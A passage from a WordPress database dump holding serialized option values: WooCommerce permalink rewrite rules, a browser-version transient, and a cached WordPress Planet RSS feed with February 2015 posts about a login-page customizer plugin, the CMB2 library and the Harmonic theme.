m)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"team-view/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"team-view/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:30:\"team-view/([^/]+)/trackback/?$\";s:31:\"index.php?team=$matches[1]&tb=1\";s:38:\"team-view/([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&paged=$matches[2]\";s:45:\"team-view/([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?team=$matches[1]&cpage=$matches[2]\";s:35:\"team-view/([^/]+)/wc-api(/(.*))?/?$\";s:45:\"index.php?team=$matches[1]&wc-api=$matches[3]\";s:41:\"team-view/[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:52:\"team-view/[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:30:\"team-view/([^/]+)(/[0-9]+)?/?$\";s:43:\"index.php?team=$matches[1]&page=$matches[2]\";s:26:\"team-view/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"team-view/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"team-view/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"team-view/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"team-view/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:39:\"index.php?&page_id=48&cpage=$matches[1]\";s:17:\"wc-api(/(.*))?/?$\";s:29:\"index.php?&wc-api=$matches[2]\";s:20:\"order-pay(/(.*))?/?$\";s:32:\"index.php?&order-pay=$matches[2]\";s:25:\"order-received(/(.*))?/?$\";s:37:\"index.php?&order-received=$matches[2]\";s:21:\"view-order(/(.*))?/?$\";s:33:\"index.php?&view-order=$matches[2]\";s:23:\"edit-account(/(.*))?/?$\";s:35:\"index.php?&edit-account=$matches[2]\";s:23:\"edit-address(/(.*))?/?$\";s:35:\"index.php?&edit-address=$matches[2]\";s:24:\"lost-password(/(.*))?/?$\";s:36:\"index.php?&lost-password=$matches[2]\";s:26:\"customer-logout(/(.*))?/?$\";s:38:\"index.php?&customer-logout=$matches[2]\";s:29:\"add-payment-method(/(.*))?/?$\";s:41:\"index.php?&add-payment-method=$matches[2]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:26:\"comments/wc-api(/(.*))?/?$\";s:29:\"index.php?&wc-api=$matches[2]\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:29:\"search/(.+)/wc-api(/(.*))?/?$\";s:42:\"index.php?s=$matches[1]&wc-api=$matches[3]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:32:\"author/([^/]+)/wc-api(/(.*))?/?$\";s:52:\"index.php?author_name=$matches[1]&wc-api=$matches[3]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:54:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/wc-api(/(.*))?/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&wc-api=$matches[5]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:41:\"([0-9]{4})/([0-9]{1,2})/wc-api(/(.*))?/?$\";s:66:\"index.php?year=$matches[1]&monthnum=$matches[2]&wc-api=$matches[4]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:28:\"([0-9]{4})/wc-api(/(.*))?/?$\";s:45:\"index.php?year=$matches[1]&wc-api=$matches[3]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:25:\"(.?.+?)/wc-api(/(.*))?/?$\";s:49:\"index.php?pagename=$matches[1]&wc-api=$matches[3]\";s:28:\"(.?.+?)/order-pay(/(.*))?/?$\";s:52:\"index.php?pagename=$matches[1]&order-pay=$matches[3]\";s:33:\"(.?.+?)/order-received(/(.*))?/?$\";s:57:\"index.php?pagename=$matches[1]&order-received=$matches[3]\";s:29:\"(.?.+?)/view-order(/(.*))?/?$\";s:53:\"index.php?pagename=$matches[1]&view-order=$matches[3]\";s:31:\"(.?.+?)/edit-account(/(.*))?/?$\";s:55:\"index.php?pagename=$matches[1]&edit-account=$matches[3]\";s:31:\"(.?.+?)/edit-address(/(.*))?/?$\";s:55:\"index.php?pagename=$matches[1]&edit-address=$matches[3]\";s:32:\"(.?.+?)/lost-password(/(.*))?/?$\";s:56:\"index.php?pagename=$matches[1]&lost-password=$matches[3]\";s:34:\"(.?.+?)/customer-logout(/(.*))?/?$\";s:58:\"index.php?pagename=$matches[1]&customer-logout=$matches[3]\";s:37:\"(.?.+?)/add-payment-method(/(.*))?/?$\";s:61:\"index.php?pagename=$matches[1]&add-payment-method=$matches[3]\";s:31:\".?.+?/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:42:\".?.+?/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:20:\"(.?.+?)(/[0-9]+)?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:25:\"([^/]+)/wc-api(/(.*))?/?$\";s:45:\"index.php?name=$matches[1]&wc-api=$matches[3]\";s:31:\"[^/]+/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:42:\"[^/]+/attachment/([^/]+)/wc-api(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&wc-api=$matches[3]\";s:20:\"([^/]+)(/[0-9]+)?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";}','yes'),(959,'_site_transient_timeout_browser_ea70fa46e8a1f69b1d236262da5ac70c','1427564781','yes'),(960,'_site_transient_browser_ea70fa46e8a1f69b1d236262da5ac70c','a:9:{s:8:\"platform\";s:9:\"Macintosh\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"41.0.2272.101\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(127,'_transient_timeout_feed_867bd5c64f85878d03a060509cd2f92c','1423377119','no'),(128,'_transient_feed_867bd5c64f85878d03a060509cd2f92c','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Tom Ford’s 15 Things\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44642\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/02/tom-fords-15-things/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1195:\"<p>For the <a href=\"http://www.vogue.co.uk/spy/15th-anniversary\">15th anniversary of Vogue.com</a> noted fashion designer Tom Ford made a list of 15 things that every man should have, which are as follow:</p>\n<ol>\n<li>A sense of humour.</li>\n<li>A daily read of a newspaper.</li>\n<li>A sport that you love and are good at.</li>\n<li>Tweezers.</li>\n<li>A good cologne that becomes a signature.</li>\n<li>A well cut dark suit.</li>\n<li>A pair of classic black lace up shoes.</li>\n<li>A smart blazer.</li>\n<li>The perfect pair of dark denim jeans.</li>\n<li>Lots of crisp white cotton shirts.</li>\n<li>Always new socks and underwear, throw away the old ones every 6 months.</li>\n<li>A classic tuxedo.</li>\n<li>A beautiful day watch with a metal band.</li>\n<li>The perfect sunglasses.</li>\n<li>Perfect teeth. If you don’t have them, save up and get them fixed.</li>\n</ol>\n<p>A pretty good list, though I would <a href=\"http://cir.ca/\">replace the newspaper with Circa</a>, and I must confess I’m not sure sure what #4 the tweezers are for.</p>\n<p><a href=\"http://om.co/2011/07/05/tom-ford-5-tips-to-be-a-modern-gentleman/\">Om also has Tom Ford’s 5 tips for a modern gentleman</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 23:49:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Customize Your Login Page Using the WordPress Customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38581\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/customize-your-login-page-using-the-wordpress-customizer\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2713:\"<p>As a result of the improvements to the Customizer API in WordPress 4.0 and 4.1, developers now have access to a wider array of controls and parameters that allow them to extend the feature for more varied uses beyond themes. The new <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Custom Login Customizer</a> plugin is a prime example of making the customizer available outside of a theme-related context.</p>\n<p>The plugin adds its own panel to the customizer with a myriad of options for customizing the design of your site’s login page.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg\" rel=\"prettyphoto[38581]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/login-customizer.jpg?resize=987%2C572\" alt=\"login-customizer\" class=\"aligncenter size-full wp-image-38688\" /></a></p>\n<p>Custom Login Customizer allows you to customize nearly every aspect of the login form, including the following:</p>\n<ul>\n<li>Set a login logo, along with width, height, and padding</li>\n<li>Add a background, select background color and size</li>\n<li>Set a background for the form</li>\n<li>Adjust form styling – width, height, padding, border</li>\n<li>Style input field width, margin, background, and input/label colors</li>\n<li>Color picker for button background, border, hover background/border, button box shadow</li>\n<li>Select text colors</li>\n<li>Add custom CSS</li>\n</ul>\n<p>I tested the plugin and found it works smoothly as advertised. Once installed, navigate to Appearance > Login Customizer in order to launch your login page in the customizer while still being logged in.</p>\n<p>Custom Login Customizer was created by WordPress developer <a href=\"http://www.hardeepasrani.com/\" target=\"_blank\">Hardeep Asrani</a> and then sold to <a href=\"https://themeisle.com/\" target=\"_blank\">ThemeIsle.com</a> last week. “I believe Themeisle will most probably have a premium version with some more features in the future,” Asrani said. “However, the free plugin will still be there at the WordPerss.org repository and will have more features soon. At this moment, there’s no premium version or a plan for it.”</p>\n<p>There are many plugins out there which allow you to customize your login page. However, the advantage of using this particular one is that you can preview your changes live before saving them. This is one of the best uses of the customizer in a plugin that I have seen so far. It makes designing your login page an easy and enjoyable experience. Download the <a href=\"https://wordpress.org/plugins/login-customizer/\" target=\"_blank\">Login Customizer</a> from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 22:44:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:74:\"WPTavern: Custom Metaboxes and Fields for WordPress (CMB2) Now Out of Beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38417\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/custom-metaboxes-and-fields-for-wordpress-cmb2-now-out-of-beta\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4291:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg\" rel=\"prettyphoto[38417]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/cmb2.jpg?resize=768%2C372\" alt=\"photo credit: Different types of wand cases stacked - (license)\" class=\"size-full wp-image-38683\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/22464562@N00/8084402724\">Different types of wand cases stacked</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The <a href=\"https://github.com/WebDevStudios/CMB2\" target=\"_blank\">Custom Metaboxes and Fields for WordPress (CMB2)</a> plugin is now officially out of beta and ready for public use. The tool was created to make it easy for developers to create metaboxes and forms with custom fields. Developers at <a href=\"http://webdevstudios.com/\" target=\"_blank\">WebDevStudios</a> took over the <a href=\"https://github.com/WebDevStudios/Custom-Metaboxes-and-Fields-for-WordPress\" target=\"_blank\">original CMB GitHub repository</a> from Jared Atchison, its original creator, in December of 2013.</p>\n<p>Justin Sternberg <a href=\"http://webdevstudios.com/2015/02/02/cmb2-wordpress-plugin/\" target=\"_blank\">explained</a> why WebDevStudios chose to start contributing to the CMB2 project:</p>\n<blockquote><p>After having been burned by some issues with other custom field plugins, we determined it was best to stick with code that we had some control over. We fell in love with CMB because it was a library we could include in any of our projects and it would just work while letting us keep all of the field configuration in the code, and more importantly, in our version control system.</p></blockquote>\n<p>Due to irreconcilable shortcomings in the original CMB, WebDevStudios opted to fork the project and create a new one that wouldn’t have the same backwards compatibility requirements. If you used CMB in the past, it’s important to note that the new CMB2 project has renamed every class, function, hook, and filter in the library to avoid conflicts with the original. It’s essentially a complete re-write.</p>\n<p>“CMB2 was built with a new mechanism to ensure it only loads the most recent version of CMB2 in your system,” Sternberg said. “This ensures that a plugin with an old bundled version will not conflict or take precedence over your up-to-date version.”</p>\n<p>The new <a href=\"https://wordpress.org/plugins/cmb2/\" target=\"_blank\">CMB2 is now available on WordPress.org</a> as a plugin for easy activation when you want to use it with one of your projects. As an alternative, you can <a href=\"https://github.com/WebDevStudios/CMB2/blob/master/example-functions.php#L14\" target=\"_blank\">include CMB2 directly</a>. The newly released plugin features the following:</p>\n<ul>\n<li>Create metaboxes to be used on post edit screens.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Using-CMB-to-create-an-Admin-Theme-Options-Page\" target=\"_blank\">Create forms to be used on an options pages.</a></li>\n<li>Create forms to handle user meta and display them on user profile add/edit pages.</li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Bringing-Metaboxes-to-the-Front-end\" target=\"_blank\">Flexible API that allows you to use CMB forms almost anywhere, even on the front-end</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Field-Types#types\" target=\"_blank\">30+ built-in field types</a></li>\n<li><a href=\"https://github.com/WebDevStudios/CMB2/wiki/Adding-your-own-field-types\" target=\"_blank\">Custom API hook that allows you to create your own field types</a></li>\n<li>Numerous hooks and filters, allowing you to modify many aspects of the library (without editing it directly)</li>\n<li>Repeatable fields for most field types are supported, as well as repeatable field groups</li>\n</ul>\n<p>The WebDevStudios team plans to maintain strict backwards compatibility moving forward, as of CMB2’s 2.0.1 release on WordPress.org. If you want to include CMB2 as part of your next project, make sure to check out the plugin’s <a href=\"https://github.com/WebDevStudios/CMB2/wiki\" target=\"_blank\">wiki and code library</a> for tips on how to add metaboxes, fields, and forms to WordPress themes and plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 21:05:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Harmonic: A Bold Free WordPress Theme for Artists and Bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38617\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/harmonic-a-bold-free-wordpress-theme-for-artists-and-bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3114:\"<p>If you like designs that feature stunning, fullscreen background images, then Automattic’s latest free theme release is a prime candidate for your next blog redesign. <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> recently landed on WordPress.org and is rapidly closing in on 3,000 downloads.</p>\n<p>This theme puts the spotlight on your images and content. Harmonic’s striking homepage is accompanied by a minimalist, one-column blog design and an optional portfolio page 